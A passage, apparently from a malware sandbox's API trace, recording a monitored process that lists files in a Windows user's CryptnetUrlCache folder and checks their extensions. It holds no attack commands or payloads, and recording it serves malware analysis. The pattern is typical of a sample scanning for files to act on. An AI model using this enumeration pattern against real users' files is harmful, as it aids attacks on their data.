wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0237.088] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\") returned="Content\\" [0237.088] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0237.088] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0237.088] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0237.088] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0237.088] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.088] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.088] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.088] PathFindFileNameW (pszPath="") returned="" [0237.088] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0237.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185cc8 | out: hHeap=0x630000) returned 1 [0237.090] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.091] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf9eaad0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf9eaad0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf9eaad0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cAlternateFileName="024823~1")) returned 1 [0237.092] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="" [0237.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.092] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bd8410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bd8410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe98d390, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x561, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", cAlternateFileName="0F1583~1")) returned 1 [0237.092] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned="" [0237.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.092] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf952550, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf952550, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf952550, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", cAlternateFileName="1BB09B~1")) returned 1 [0237.092] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned="" [0237.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.092] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4c00edb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c00edb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4c00edb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xf1d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1DAF2884EC4DFA96BA4A58D4DBC9C406", cAlternateFileName="1DAF28~1")) returned 1 [0237.092] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned="" [0237.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.092] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x580eb5c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x580eb5c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaedd4300, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x145, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="23B523C9E7746F715D33C6527C18EB9D", cAlternateFileName="23B523~1")) returned 1 [0237.092] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D") returned="" [0237.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.092] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc3791460, ftCreationTime.dwHighDateTime=0x1d2e675, ftLastAccessTime.dwLowDateTime=0xc3791460, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc3791460, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0237.092] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0237.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.092] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53fdc930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53fdc930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf16fc70, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", cAlternateFileName="3388EC~1")) returned 1 [0237.092] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned="" [0237.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.092] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53b19d30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53b19d30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54583d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cAlternateFileName="40E450~1")) returned 1 [0237.093] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="" [0237.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.093] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54537ab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54537ab0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae76e7e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", cAlternateFileName="4C8F84~1")) returned 1 [0237.093] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned="" [0237.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.093] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7295ee20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7295ee20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xadfb2060, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", cAlternateFileName="4DD397~1")) returned 1 [0237.093] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned="" [0237.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.093] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf8b9fd0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf8b9fd0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf8b9fd0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", cAlternateFileName="5080DC~2")) returned 1 [0237.093] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned="" [0237.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.093] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf86dd10, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf86dd10, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf86dd10, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", cAlternateFileName="5080DC~1")) returned 1 [0237.093] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned="" [0237.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.093] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf7af630, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", cAlternateFileName="5457A8~1")) returned 1 [0237.093] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned="" [0237.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.093] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xed9b0820, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xed9b0820, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xed9b0820, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x32d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0237.093] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned="" [0237.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.093] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf763370, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", cAlternateFileName="705A76~1")) returned 1 [0237.093] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned="" [0237.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.093] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedb2d5e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedb2d5e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedb2d5e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x22a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0237.093] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0237.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.094] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x312640, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", cAlternateFileName="7423F8~1")) returned 1 [0237.094] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned="" [0237.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.094] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd0e4c510, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x1fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0237.094] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0237.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.094] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b2324c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b2324c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b2324c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x67c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", cAlternateFileName="7B8944~1")) returned 1 [0237.094] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned="" [0237.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.094] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b199f40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b199f40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b199f40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", cAlternateFileName="7D266D~2")) returned 1 [0237.095] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned="" [0237.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.095] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefaf7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefaf7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaec313e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", cAlternateFileName="7D266D~1")) returned 1 [0237.096] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned="" [0237.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.096] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6056b480, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6056b480, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1ef687a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", cAlternateFileName="8059E9~3")) returned 1 [0237.096] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned="" [0237.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.096] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61210960, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61210960, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaecc9960, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", cAlternateFileName="80273C~1")) returned 1 [0237.096] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned="" [0237.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.096] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58e24200, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58e24200, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9f5f40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", cAlternateFileName="8059E9~2")) returned 1 [0237.096] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned="" [0237.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.096] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61236ac0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61236ac0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3b0b01a0, 